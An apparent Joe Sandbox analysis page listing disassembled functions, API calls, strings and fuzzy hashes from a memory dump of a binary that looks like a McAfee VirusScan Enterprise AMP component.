Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FF8FDF9FD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: d1bed244d7ed21aaa205bd0199b39823c0ad418e338c6eda34d152df14145558
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: B8F06272B192958EEBA49F28A842E297BD0E7583D0F948039D69F83B44E63D90608F44

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseInit, xrefs: 00000001400010FA
vseGlobalRelease, xrefs: 00000001400010DF
vseExec, xrefs: 0000000140001130
vseGet, xrefs: 000000014000114B
vseSet, xrefs: 0000000140001166
vseRelease, xrefs: 0000000140001115
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseGlobalInit, xrefs: 00000001400010C8
msi.dll, xrefs: 0000000140001042
MsiLocateComponentW, xrefs: 0000000140001062

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

action, xrefs: 0000000140003020
?, xrefs: 0000000140002FFE
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtAdd, xrefs: 0000000140002BD5
vseqrtInit, xrefs: 0000000140002BA3
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtRelease, xrefs: 0000000140002BBA

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

kernel32.dll, xrefs: 0000000140004D3C
SetDllDirectoryW, xrefs: 0000000140004D58

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
